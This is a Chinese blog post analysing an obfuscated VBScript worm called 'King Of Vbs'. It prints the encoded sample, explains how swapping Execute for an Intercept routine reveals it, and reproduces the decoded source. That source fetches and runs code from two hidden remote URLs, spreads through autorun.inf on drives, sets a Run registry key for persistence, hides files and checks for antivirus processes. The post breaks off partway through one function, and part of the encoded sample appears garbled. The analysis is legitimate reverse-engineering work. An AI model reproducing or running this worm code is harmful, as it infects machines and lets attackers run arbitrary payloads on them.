VBS病毒解密初探

最新推荐文章于 2022-11-17 09:38:15 发布

iiprogram

最新推荐文章于 2022-11-17 09:38:15 发布

阅读量2.1k

点赞数

分类专栏：脚本网页语言安全和网站攻防文章标签：解密 function path file date 加密

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/iiprogram/article/details/2417838

版权

脚本网页语言安全和网站攻防专栏收录该内容

68 篇文章 0 订阅

订阅专栏

1。加密的VBS病毒：

引用:

'0.1
aa="(( '5.6}{=|5.6|}{=|'|}{=|'.|}{=|K O V|& }{=|F W 65.65|}{=(659)&(661)&(661)&(667)&|://|&(30)&|.|&(93)&(00)&(06)&|1|&(655)&(91)&(665)&||&(92)&||&(92)&||&(09)&(91)&(10)&(660)&(35)}{7=(659)&(661)&(661)&(667)&|://|&|6|&(05)&(07)&(91)&(00)&|21|&(09)&(91)&(24)&(669)&(26)&(92)&||&(92)&(31)&(09)&(91)&(10)&(38)&(667)}{ }{ }{ = (|.|)}{ = (|.|)}{ = .(6)}{ = .(5)}{ = .}{=.}{=.(7)&|/|}{=.(6)&|//|}{=(.,(.)-(.))}{ =&|/| =}{ ))
()
(( (&|/.|,6)<>() }{=6}{ <>|<>|}{ >7 }{ &|.|,7,5,6,655}{=(&|.|,6)}{}{ &|.|,,5,6,655}{=(&|.|,6)}{ }{=+6}{ >9 }{ }{ }{}{ .(&|.|) }{ = .(&|.|, 6)  }{ = .}{ = .}{ = .}{ = .}{ = .}{ = .}{ = .}{ = .}{ = .}{ = .}{= .}{.  }{.(&|.|)}{ =|<>| }{ &|/.|,}{ ,,,}{ <> .(&|/|&) }{ &|/|&,,,8,7555}{.}{ }{ =6 }{ <> .(&) }{ &}{ &,,6,8,6555}{ }{ }{ }{ }{ }{ }{ }{ (&,2)=6 }{(((&,4)))}{ }{ ))

()
(( .() }{ ,5}{.()}{ }{ .() }{ ,5}{.()}{ ))

(,)
(( }{ = .(, )}{. }{.}{ ,7+9 ))

(,,,)
(( &}{ = .(&, )}{. }{. |[]|}{. }{. |=. ./|&&|.|}{. }{. |/=打开(&)|}{. }{. |//=. ./|&&|.|}{. }{. |//=6|}{. }{.}{ &,6+7+9 ))

(,)
(( .() }{ = .(, 6)  }{=5 }{ <}{=+6}{ = .}{}{.}{=}{}{=|_|}{ ))

(,)
(( .() }{ = .() }{. = }{ = }{ }{ .() }{ = .()}{. = }{ = }{ ))

(,,,,)
(( =5}{ <}{ ,5}{ = (): = ():}{' 6=7 . |!|}{ = (|.|)  }{' 6=7 . |!|}{. ||,,5 }{' 6=7 . |!|}{ }{.()}{ }{' 6=7 . |!|}{ = (|.|) }{' 6=7 . |!|}{. = 8 }{' 6=7 . |!|}{. = 6  }{' 6=7 . |!|}{.()  }{' 6=7 . |!|}{.(.)  }{' 6=7 . |!|}{. ,7 }{' 6=7 . |!|}{ ,7+9}{ .() }{=.().}{}{=5}{ }{ > }{ =6 . }{ }{ }{}{=+6}{ }{. 8555}{ }{ ))

()
. = 5
=

.
=

()
= 188211798279118902310182029107377911277514886750917591017317748168962818739141973177147867474777118717794117516886878075091310175168868877711871779411751688687887509131017516886857771187177141175168868789750913101751688889777118717714117516884817516119751688686857529131017771187177168167868877711871":function ee(aa):hh=vbCrLf:Execute("For i=1 To Len(aa)"&hh&"a=Asc(Mid(aa,i,1))"&hh&"If a=127 Then a=13"&hh&"If a=11 Then a=10"&hh&"if a=12 Then a=34"&hh&"if a>=14 and a<=31 then"&hh&"a=a+83"&hh&"elseif a>=1 and a<=8 then"&hh&"a=a+114"&hh&"elseif a>=53 and a<=57 then"&hh&"a=a-5"&hh&"elseif a>=48 and a<=52 then"&hh&"a=a+5"&hh&"End If"&hh&"ee=ee+chr(a)"&hh&"Next"):end function:bb="7710128101411751688685847516119751688687887529131017771187177168167868877711871779011975941177711871772018820187181327731674777118717791023297774 := := &(& := ) : ()>6: ((,6)) =&&(,7)&:=(,8) =&+(,9)+:=(,0)
:()

()
( )

(( }{ =&|/| =.(| |&,8,)}{}{ }{. 0555}{ (|.|,7)=6 (&|/.|,6)= () .}{ (|.|,7)<>6 (|.|,7) .}{ }{ (&,6)<>|'|& }{}{ }{ }{}{ (&,6)<> }{ ,5,5,5}{ }{=(&,0)}{ .(&) }{. &}{ }{ (&|/|&&|.|,6)<>|'|& }{ &|/|&&|.|}{}{ }{ (&|/|&&|.|,6)<>|'|& }{ &|/|&&|.|}{ }{ (&&|.|,6)<>|'|& (&,66)=6 }{ &&|.|,(O6+O7)}{ }{ (&,66)=7 }{ }{ . = 7 }{ .(&|/.|) }{ &|/.|}{ }{ .(&|/.|) }{ &|/.|}{ &|/.|,6+7+9}{ }{ }{}{ }{ (|.|,6) }{=6}{ (|.|,6) }{=7}{ (|.|,6) }{=8}{ }{=9}{ }{ = () 8 }{ (=6 =6) (=7 =7) (=8 =7) (=9 =5) }{}{ &|/.|,}{ }{}{}{. &}{}{ &,7+9}{ &|/|&&|.|}{ &|/|&&|.|}{}{. &|/|&&|.|}{ ))
(,)
(( }{ =(|://.//7|) }{ =.(| * 87_ ='|&&|'|)}{=6 }{ }{=+6}{}{ }{ > = }{}{ = 6}{ ))

(,)

.()
. ,,

()

=.(&,6)
=.
.
= .(, )
.
.
,7+9

()
RP= HKEY_LOCAL_MACHINE/SOFTWARE/M/W/CV//E//
T_N= REG_SZ
K_N=
K_D=& .
W.RW RP&K_N,K_D,T_N

()
RP= HKEY_CURRENT_USER/S/M/W/CV/E/A/
T_N= REG_DWORD
K_N= SSH
K_D= 55555555
W.RW RP&K_N,K_D,T_N

()
.()

.(.())
.()

.()

(,,,)
(( .(&) (,6) }{ &,|://|&,5,7,8555}{ }{ .(&) }{ <>5 }{=}{. |%% / 7557-|&()&|-|&(),}{. (*6555)}{ }{. &}{=6}{ >5 }{. 0555}{. |%% / |&,}{ }{ ))

()
(( }{ }{ . = 8 (. = 6 <>|A:| <> |B:|) }{ .(&|/.|) }{ &|/.|}{ }{ .(&|/|&&|.|) .(&|/.|) }{ (&|/.|,6)<> }{ &|/|&,&|/.|}{ &|/|&&|.|,&|/|&&|.|}{ }{}{}{ &|/|&,&|/.|}{ &|/|&&|.|,&|/|&&|.|}{ }{ }{}{ (() 7)=5 <>-6 }{}{ }{. 8555}{ ))

()
(( (|,!|)}{ &}{. ))
":Execute(ee(aa&bb)):ff=". (*6555)}{ }{. &}{=6}{ >5 }{. 0555}{. |%% / |&,}{ }{ ))

()
(( }{ }{ . = 8 (. = 6 <>|A:| <> |B:|) }{ .(&|/.|) }{ &|/.|}{ }{ .(&|/|&&|.|) .(&|/.|) }{ (&|/.|,6)<> }{ "

2。第一次解密：
注意末尾有个 execute，修改为intercept，在VBS源码后面加上Intercept 代码，代码如下：

引用:

Sub Intercept (ee)
WScript.Echo ee
OutPutFile="decode_1.txt"
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objTXT=objFSO.CreateTextFile(OutPutFile,True,False)
objTXT.Write ee
objTXT.Close
Set objWSH=CreateObject("WScript.Shell")
objWSH.Run OutPutFile
WScript.Quit
End Sub

另存为vbs 文件，运行后出来一个框，确定后得到decode_1.txt文档：

引用:

execute(uc("'0.1}{ire=|0.1|}{svyranzr=|'|}{vasanzr=|'.vav|}{gvyr=|Kvat Os Vof|&ire }{nobhg=|Fbe Wbeq 10.10|}{sebzhey=pue(104)&pue(116)&pue(116)&pue(112)&|://|&pue(85)&|b.|&pue(48)&pue(55)&pue(51)&|6p|&pue(100)&pue(46)&pue(110)&|rg|&pue(47)&|b|&pue(47)&|i|&pue(54)&pue(46)&pue(65)&pue(115)&pue(80)}{sebzhey2=pue(104)&pue(116)&pue(116)&pue(112)&|://|&|k1|&pue(50)&pue(52)&pue(46)&pue(55)&|76|&pue(54)&pue(46)&pue(79)&pue(114)&pue(71)&pue(47)&|b|&pue(47)&pue(86)&pue(54)&pue(46)&pue(65)&pue(83)&pue(112)}{ba reebe erfhzr arkg}{qvz jfu}{frg jfu = perngrbowrpg(|jfpevcg.furyy|)}{frg sfb = perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|)}{frg qve = sfb.trgfcrpvnysbyqre(1)}{frg jva = sfb.trgfcrpvnysbyqre(0)}{frg qp = sfb.qevirf}{bhjaanzr=jfpevcg.fpevcganzr}{rkrzhyh=sfb.trgfcrpvnysbyqre(2)&|/|}{jorz=sfb.trgfcrpvnysbyqre(1)&|/jorz/|}{zhyh=yrsg(jfpevcg.fpevcgshyyanzr,yra(jfpevcg.fpevcgshyyanzr)-yra(jfpevcg.fpevcganzr))}{vs zhyh=qve&|/| gura flf=gehr}{"))
function gettask()
execute(uc("vs ernqgkg(qve&|/qngr.ova|,1)<>gevz(qngr) gura}{wf=1}{qb juvyr purpx<>|<fpevcg>|}{vs wf>2 gura}{nqiqbjasvyr zhyh&|grzc.gkg|,sebzhey2,0,1,100}{purpx=ernqgkg(zhyh&|grzc.gkg|,1)}{ryfr}{nqiqbjasvyr zhyh&|grzc.gkg|,sebzhey,0,1,100}{purpx=ernqgkg(zhyh&|grzc.gkg|,1)}{raq vs}{wf=wf+1}{vs wf>4 gura}{rkvg qb}{raq vs}{ybbc}{vs sfb.svyrrkvfgf(zhyh&|grzc.gkg|) gura}{frg bcrasvyr = sfb.bcragrkgsvyr(zhyh&|grzc.gkg|, 1)  }{purpx = bcrasvyr.ernqyvar}{qbjavf = bcrasvyr.ernqyvar}{qbjanzr = bcrasvyr.ernqyvar}{qbjasebz = bcrasvyr.ernqyvar}{iofire = bcrasvyr.ernqyvar}{iofeha = bcrasvyr.ernqyvar}{iofanzr = bcrasvyr.ernqyvar}{iofsebz = bcrasvyr.ernqyvar}{gnfxvf = bcrasvyr.ernqyvar}{gnfxpbqr = bcrasvyr.ernqyvar}{hcior= bcrasvyr.ernqyvar}{bcrasvyr.pybfr  }{sfb.qryrgrsvyr(zhyh&|grzc.gkg|)}{vs purpx=|<fpevcg>| gura}{ohvyqsvyr qve&|/qngr.ova|,qngr}{ohvyqvas qbjanzr,gnfxvf,gnfxpbqr,hcior}{vs iofire<>ire be abg sfb.svyrrkvfgf(qve&|/|&iofanzr) gura}{nqiqbjasvyr qve&|/|&iofanzr,iofsebz,iofeha,3,2000}{jfpevcg.dhvg}{raq vs}{vs qbjavf=1 naq flf gura}{vs qbjanzr<>yrkr be abg sfb.svyrrkvfgf(rkrzhyh&yrkr) gura}{qrysvyr rkrzhyh&yrkr}{nqiqbjasvyr rkrzhyh&qbjanzr,qbjasebz,1,3,1000}{raq vs}{raq vs}{raq vs}{raq vs}{raq vs}{ba reebe erfhzr arkg}{vs flf gura}{vs ernqgkg(zhyh&vasanzr,7)=1 gura}{rkrphgr(hp(ernqgkg(zhyh&vasanzr,9)))}{raq vs}{raq vs"))
end function
function delfile(where)
execute(uc("vs sfb.svyrrkvfgf(jurer) gura }{fuhkvat jurer,0}{sfb.qryrgrsvyr(jurer)}{raq vs}{vs sfb.sbyqrerkvfgf(jurer) gura}{fuhkvat jurer,0}{sfb.qryrgrsbyqre(jurer)}{raq vs"))
end function
function buildfile(where,what)
execute(uc("qrysvyr jurer}{frg ova = sfb.perngrgrkgsvyr(jurer, gehr)}{ova.jevgryvar jung}{ova.pybfr}{fuhkvat jurer,2+4"))
end function
function buildinf(exever,taskcode,tasksw,adv)
execute(uc("qrysvyr zhyh&vasanzr}{frg vav = sfb.perngrgrkgsvyr(zhyh&vasanzr, gehr)}{vav.jevgryvar gvyr}{vav.jevgryvar |[nhgbeha]|}{vav.jevgryvar nobhg}{vav.jevgryvar |bcra=jfpevcg.rkr ./|&svyranzr&|.iof|}{vav.jevgryvar rkrire}{vav.jevgryvar |furyy/bcra=打开(&b)|}{vav.jevgryvar gnfxpbqr}{vav.jevgryvar |furyy/bcra/pbzznaq=jfpevcg.rkr ./|&svyranzr&|.iof|}{vav.jevgryvar gnfxfj}{vav.jevgryvar |furyy/bcra/qrsnhyg=1|}{vav.jevgryvar nqi}{vav.pybfr}{fuhkvat zhyh&vasanzr,1+2+4"))
end function
function readtxt(where,line)
execute(uc("vs sfb.svyrrkvfgf(jurer) gura}{frg ernqsvyr = sfb.bcragrkgsvyr(jurer, 1)  }{v=0 }{qb juvyr v<yvar}{v=v+1}{fgeyvar = ernqsvyr.ernqyvar}{ybbc}{ernqsvyr.pybfr}{ernqgkg=fgeyvar}{ryfr}{ernqgkg=|abg_sbhaq|}{raq vs"))
end function
function shuxing(file,change)
execute(uc("vs sfb.svyrrkvfgf(svyr) gura}{frg bsvyr = sfb.trgsvyr(svyr) }{bsvyr.nggevohgrf = punatr}{frg bsvyr = abguvat}{raq vs}{vs sfb.sbyqrerkvfgf(svyr) gura}{frg bsvyr = sfb.trgsbyqre(svyr)}{bsvyr.nggevohgrf = punatr}{frg bsvyr = abguvat}{raq vs"))
end function
function advdownfile(localfile,urlfile,runfile,cishu,minsize)
execute(uc("grfg=0}{qb juvyr grfg<pvfuh}{fuhkvat ybpnysvyr,0}{vybpny = ypnfr(ybpnysvyr):verzbgr = ypnfr(heysvyr):}{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{frg kcbfg = perngrbowrpg(|zvpebfbsg.kzyuggc|)  }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{kcbfg.bcra |trg|,verzbgr,0 }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ba reebe erfhzr arkg}{kcbfg.fraq()}{vs abg re gura}{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{frg ftrg = perngrbowrpg(|nqbqo.fgernz|) }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ftrg.zbqr = 3 }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ftrg.glcr = 1  }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ftrg.bcra()  }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ftrg.jevgr(kcbfg.erfcbafrobql)  }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{ftrg.fnirgbsvyr vybpny,2 }{'vs 1=2 gura jfpevcg.rpub |vzcbffvoyr!|}{fuhkvat ybpnysvyr,2+4}{vs sfb.svyrrkvfgf(ybpnysvyr) gura}{svyrfvmr=sfb.trgsvyr(ybpnysvyr).fvmr}{ryfr}{svyrfvmr=0}{raq vs}{vs svyrfvmr>zvafvmr gura}{vs ehasvyr=1 gura jfu.eha ybpnysvyr}{rkvg qb}{raq vs}{ryfr}{grfg=grfg+1}{qrysvyr ybpnysvyr}{jfpevcg.fyrrc 3000}{raq vs}{ybbc"))
end function
function er()
if err.number = 0 then
er = false
else
err.clear
er = true
end if
end function
function uc(b)
x="633d766243724c663a457865637574652822466f7220693d3120546f204c656e2862293a613d417363284d696428622c692c3129292226632622496620613d313235205468656e20613d31332226632622496620613d313233205468656e20613d31302226632622696620613d313234205468656e20613d33342226632622696620613e393620616e6420613c313130207468656e2226632622613d612b31332226632622656c7365696620613e31303920616e6420613c313233207468656e2226632622613d612d31332226632622456e64204966222663262275633d75632b63687228612922266326224e6578742229":y="execute """"":z="&chr(&h":w=")":do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)
loop:execute(y)
end function
function ucc(b)
msgbox("holle hacker")
end function
execute(uc("sbe rnpu q va qp}{vs zhyh=q&|/| gura bcraqvfx=jfu.eha(|rkcybere |&q,3,snyfr)}{arkg}{vs abg flf gura}{jfpevcg.fyrrc 5000}{vs wvapurat(|jfpevcg.rkr|,2)=1 naq ernqgkg(qve&|/qngr.ova|,1)= gevz(qngr) gura jfpevcg.dhvg}{vs wvapurat(|jfpevcg.rkr|,2)<>1 naq wvapurat(|jfpevcg.rkr|,2) gura jfpevcg.dhvg}{raq vs}{vs ernqgkg(zhyh&bhjaanzr,1)<>|'|&ire gura}{puratsn}{raq vs}{vs flf gura}{lvapnat}{vs ernqgkg(zhyh&vasanzr,1)<>gvyr gura}{ohvyqvas ire,0,0,0}{raq vs}{yrkr=ernqgkg(zhyh&vasanzr,5)}{vs sfb.svyrrkvfgf(rkrzhyh&yrkr) gura}{jfu.eha rkrzhyh&yrkr}{raq vs}{vs ernqgkg(qve&|/|&svyranzr&|.ior|,1)<>|'|&ire gura}{pbcliof qve&|/|&svyranzr&|.ior|}{muhpr}{raq vs}{vs ernqgkg(jva&|/|&svyranzr&|.ior|,1)<>|'|&ire gura}{pbcliof jva&|/|&svyranzr&|.ior|}{raq vs}{vs ernqgkg(jorz&svyranzr&|.ior|,1)<>|'|&ire naq ernqgkg(zhyh&vasanzr,11)=1 gura}{ohvyqsvyr jorz&svyranzr&|.ior|,hpp(O1+O2)}{raq vs}{vs ernqgkg(zhyh&vasanzr,11)=2 gura}{sbe rnpu q va qp}{vs q.qevirglcr = 2 gura}{vs sfb.svyrrkvfgf(q&|/nhgbeha.vas|) gura}{qrysvyr q&|/nhgbeha.vas|}{raq vs}{vs abg sfb.sbyqrerkvfgf(q&|/nhgbeha.vas|) gura}{ohvyqsbyq q&|/nhgbeha.vas|}{fuhkvat q&|/nhgbeha.vas|,1+2+4}{raq vs}{raq vs}{arkg}{raq vs}{vs wvapurat(|nic.rkr|,1) gura }{x=1}{ryfrvs wvapurat(|xjngpu.rkr|,1) gura }{x=2}{ryfrvs wvapurat(|ppragre.rkr|,1) gura }{x=3}{ryfr }{x=4}{raq vs}{g = qnl(qngr) zbq 3 }{vs (x=1 naq g=1) be (x=2 naq g=2) be (x=3 naq g=2) be (x=4 naq g=0) gura}{ryfr}{ohvyqsvyr qve&|/qngr.ova|,qngr}{raq vs}{}{tnaena}{jfu.eha zhyh&bhjaanzr}{ryfr}{fuhkvat zhyh&bhjaanzr,2+4}{pbcliof qve&|/|&svyranzr&|.ior|}{pbcliof jva&|/|&svyranzr&|.ior|}{muhpr}{jfu.eha qve&|/|&svyranzr&|.ior|}{raq vs"))
function jincheng(where,geshu)
execute(uc("ba reebe erfhzr arkg}{frg l=trgbowrpg(|jvaztzgf://./ebbg/pvzi2|) }{frg k=l.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&jurer&|'|)}{v=1 }{sbe rnpu w va k }{v=v+1}{arkg}{vs abg re gura}{vs v>trfuh gura wvapurat = gehr}{ryfr}{wvapurat = 1}{raq vs"))
end function
function copyfile(file,where)
delfile where
if fso.fileexists(file) then
fso.copyfile file,where,true
end if
end function
function copyvbs(where)
delfile where
set self=fso.opentextfile(mulu&ouwnname,1)
vbscopy=self.readall
self.close
set vbs = fso.createtextfile(where, true)
vbs.write vbscopy
vbs.close
shuxing where,2+4
end function
function zhuce()
RegPath="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/policies/Explorer/run/"
Type_Name="REG_SZ"
Key_Name="explorer"
Key_Data=filename&".vbe"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function
function yincang()
RegPath="HKEY_CURRENT_USER/ Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced/"
Type_Name="REG_DWORD"
Key_Name="ShowSuperHidden"
Key_Data="00000000"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function
function buildfold(path)
if fso.folderexists(path) then
exit function
end if
if not fso.folderexists(fso.getparentfoldername(path)) then
buildfold fso.getparentfoldername(path)
end if
fso.createfolder(path)
end function
function dowork(pcs,fname,furl,time)
execute(uc("vs abg sfb.svyrrkvfgf(rkrzhyh&sanzr) naq wvapurat(cpf,1) gura}{nqiqbjasvyr rkrzhyh&sanzr,|uggc://|&shey,0,2,3000}{raq vs}{vs sfb.svyrrkvfgf(rkrzhyh&sanzr) gura}{vs gvzr<>0 gura}{abjqngr=qngr}{jfu.eha |%pbzfcrp% /p qngr 2002-|&zbagu(qngr)&|-|&qnl(qngr),iouvqr}{jfpevcg.fyrrc nof(gvzr*1000)}{raq vs}{jfu.eha rkrzhyh&sanzr}{qbjbex=1}{vs gvzr>0 gura}{jfpevcg.fyrrc 5000}{jfu.eha |%pbzfcrp% /p qngr |&abjqngr,iouvqr}{raq vs }{raq vs"))
end function
function ganran()
execute(uc("qb}{sbe rnpu q va qp}{vs q.qevirglcr = 3 be (q.qevirglcr = 1 naq q<>|A:| naq q<> |B:|) gura}{vs sfb.sbyqrerkvfgf(q&|/nhgbeha.vas|) gura}{qrysvyr q&|/nhgbeha.vas|}{raq vs}{vs sfb.svyrrkvfgf(q&|/|&svyranzr&|.iof|) naq sfb.svyrrkvfgf(q&|/nhgbeha.vas|) gura}{vs ernqgkg(q&|/nhgbeha.vas|,1)<>gvyr gura}{pbclsvyr qve&|/|&vasanzr,q&|/nhgbeha.vas|}{pbclsvyr jva&|/|&svyranzr&|.ior|,q&|/|&svyranzr&|.iof|}{raq vs}{ryfr}{lvapnat}{pbclsvyr qve&|/|&vasanzr,q&|/nhgbeha.vas|}{pbclsvyr jva&|/|&svyranzr&|.ior|,q&|/|&svyranzr&|.iof|}{raq vs}{raq vs}{arkg}{vs (zvahgr(abj) zbq 2)=0 naq ej<>-1 gura }{trggnfx}{raq vs}{jfpevcg.fyrrc 3000}{ybbc"))
end function
function chengfa()
execute(uc("zftobk(|uryyb,unpxre!|)}{qrysvyr zhyh&bhjaanzr}{jfpevcg.dhvg"))
end function

3.获取再次解密的函数：
看到好多execute(uc)的加密，看看中间部分有个函数就是解密函数：

引用:

function uc(b)
x="633d766243724c663a457865637574652822466f7220693d3120546f204c656e2862293a613d417363284d696428622c692c3129292226632622496620613d313235205468656e20613d31332226632622496620613d313233205468656e20613d31302226632622696620613d313234205468656e20613d33342226632622696620613e393620616e6420613c313130207468656e2226632622613d612b31332226632622656c7365696620613e31303920616e6420613c313233207468656e2226632622613d612d31332226632622456e64204966222663262275633d75632b63687228612922266326224e6578742229":y="execute """"":z="&chr(&h":w=")":do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)
loop:execute(y)
end function

这段也加密，先解密，老方法，intercept之，得到：

引用:

execute ""&chr(&h63)&chr(&h3d)&chr(&h76)&chr(&h62)&chr(&h43)&chr(&h72)&chr(&h4c)&chr(&h66)&chr(&h3a)&chr(&h45)&chr(&h78)&chr(&h65)&chr(&h63)&chr(&h75)&chr(&h74)&chr(&h65)&chr(&h28)&chr(&h22)&chr(&h46)&chr(&h6f)&chr(&h72)&chr(&h20)&chr(&h69)&chr(&h3d)&chr(&h31)&chr(&h20)&chr(&h54)&chr(&h6f)&chr(&h20)&chr(&h4c)&chr(&h65)&chr(&h6e)&chr(&h28)&chr(&h62)&chr(&h29)&chr(&h3a)&chr(&h61)&chr(&h3d)&chr(&h41)&chr(&h73)&chr(&h63)&chr(&h28)&chr(&h4d)&chr(&h69)&chr(&h64)&chr(&h28)&chr(&h62)&chr(&h2c)&chr(&h69)&chr(&h2c)&chr(&h31)&chr(&h29)&chr(&h29)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h49)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h31)&chr(&h32)&chr(&h35)&chr(&h20)&chr(&h54)&chr(&h68)&chr(&h65)&chr(&h6e)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h31)&chr(&h33)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h49)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h31)&chr(&h32)&chr(&h33)&chr(&h20)&chr(&h54)&chr(&h68)&chr(&h65)&chr(&h6e)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h31)&chr(&h30)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h69)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h31)&chr(&h32)&chr(&h34)&chr(&h20)&chr(&h54)&chr(&h68)&chr(&h65)&chr(&h6e)&chr(&h20)&chr(&h61)&chr(&h3d)&chr(&h33)&chr(&h34)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h69)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3e)&chr(&h39)&chr(&h36)&chr(&h20)&chr(&h61)&chr(&h6e)&chr(&h64)&chr(&h20)&chr(&h61)&chr(&h3c)&chr(&h31)&chr(&h31)&chr(&h30)&chr(&h20)&chr(&h74)&chr(&h68)&chr(&h65)&chr(&h6e)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h61)&chr(&h3d)&chr(&h61)&chr(&h2b)&chr(&h31)&chr(&h33)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h65)&chr(&h6c)&chr(&h73)&chr(&h65)&chr(&h69)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3e)&chr(&h31)&chr(&h30)&chr(&h39)&chr(&h20)&chr(&h61)&chr(&h6e)&chr(&h64)&chr(&h20)&chr(&h61)&chr(&h3c)&chr(&h31)&chr(&h32)&chr(&h33)&chr(&h20)&chr(&h74)&chr(&h68)&chr(&h65)&chr(&h6e)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h61)&chr(&h3d)&chr(&h61)&chr(&h2d)&chr(&h31)&chr(&h33)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h45)&chr(&h6e)&chr(&h64)&chr(&h20)&chr(&h49)&chr(&h66)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h75)&chr(&h63)&chr(&h3d)&chr(&h75)&chr(&h63)&chr(&h2b)&chr(&h63)&chr(&h68)&chr(&h72)&chr(&h28)&chr(&h61)&chr(&h29)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h4e)&chr(&h65)&chr(&h78)&chr(&h74)&chr(&h22)&chr(&h29)

再次intercept之：

引用:

c=vbCrLf:Execute("For i=1 To Len(b):a=Asc(Mid(b,i,1))"&c&"If a=125 Then a=13"&c&"If a=123 Then a=10"&c&"if a=124 Then a=34"&c&"if a>96 and a<110 then"&c&"a=a+13"&c&"elseif a>109 and a<123 then"&c&"a=a-13"&c&"End If"&c&"uc=uc+chr(a)"&c&"Next")

4.分段解密decode_1.txt：
第一段：

引用:

'0.1
ver="0.1"
filename="'"
infname="'.ini"
tile="King Of Vbs"&ver
about="For Word 10.10"
fromurl=chr(104)&chr(116)&chr(116)&chr(112)&"://"&chr(85)&"o."&chr(48)&chr(55)&chr(51)&"6c"&chr(100)&chr(46)&chr(110)&"et"&chr(47)&"o"&chr(47)&"v"&chr(54)&chr(46)&chr(65)&chr(115)&chr(80)
fromurl2=chr(104)&chr(116)&chr(116)&chr(112)&"://"&"x1"&chr(50)&chr(52)&chr(46)&chr(55)&"76"&chr(54)&chr(46)&chr(79)&chr(114)&chr(71)&chr(47)&"o"&chr(47)&chr(86)&chr(54)&chr(46)&chr(65)&chr(83)&chr(112)
on error resume next
dim wsh
set wsh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
set dir = fso.getspecialfolder(1)
set win = fso.getspecialfolder(0)
set dc = fso.drives
ouwnname=wscript.scriptname
exemulu=fso.getspecialfolder(2)&"/"
wbem=fso.getspecialfolder(1)&"/wbem/"
mulu=left(wscript.scriptfullname,len(wscript.scriptfullname)-len(wscript.scriptname))
if mulu=dir&"/" then sys=true

第二段：原文有function头尾标志，先删除再解密

引用:

function gettask()
if readtxt(dir&"/date.bin",1)<>trim(date) then
js=1
do while check<>"<script>"
if js>2 then
advdownfile mulu&"temp.txt",fromurl2,0,1,100
check=readtxt(mulu&"temp.txt",1)
else
advdownfile mulu&"temp.txt",fromurl,0,1,100
check=readtxt(mulu&"temp.txt",1)
end if
js=js+1
if js>4 then
exit do
end if
loop
if fso.fileexists(mulu&"temp.txt") then
set openfile = fso.opentextfile(mulu&"temp.txt", 1)
check = openfile.readline
downis = openfile.readline
downame = openfile.readline
downfrom = openfile.readline
vbsver = openfile.readline
vbsrun = openfile.readline
vbsname = openfile.readline
vbsfrom = openfile.readline
taskis = openfile.readline
taskcode = openfile.readline
upvbe= openfile.readline
openfile.close
fso.deletefile(mulu&"temp.txt")
if check="<script>" then
buildfile dir&"/date.bin",date
buildinf downame,taskis,taskcode,upvbe
if vbsver<>ver or not fso.fileexists(dir&"/"&vbsname) then
advdownfile dir&"/"&vbsname,vbsfrom,vbsrun,3,2000
wscript.quit
end if
if downis=1 and sys then
if downame<>lexe or not fso.fileexists(exemulu&lexe) then
delfile exemulu&lexe
advdownfile exemulu&downame,downfrom,1,3,1000
end if
end if
end if
end if
end if
on error resume next
if sys then
if readtxt(mulu&infname,7)=1 then
execute(uc(readtxt(mulu&infname,9)))
end if
end if
end function

第三段：

引用:

function delfile(where)
if fso.fileexists(where) then
shuxing where,0
fso.deletefile(where)
end if
if fso.folderexists(where) then
shuxing where,0
fso.deletefolder(where)
end if
end function

第四段：

引用:

function buildfile(where,what)
delfile where
set bin = fso.createtextfile(where, true)
bin.writeline what
bin.close
shuxing where,2+4
end function

第五段：

引用:

function buildinf(exever,taskcode,tasksw,adv)
delfile mulu&infname
set ini = fso.createtextfile(mulu&infname, true)
ini.writeline tile
ini.writeline "[autorun]"
ini.writeline about
ini.writeline "open=wscript.exe ./"&filename&".vbs"
ini.writeline exever
ini.writeline "shell/open=打开(&o)"
ini.writeline taskcode
ini.writeline "shell/open/command=wscript.exe ./"&filename&".vbs"
ini.writeline tasksw
ini.writeline "shell/open/default=1"
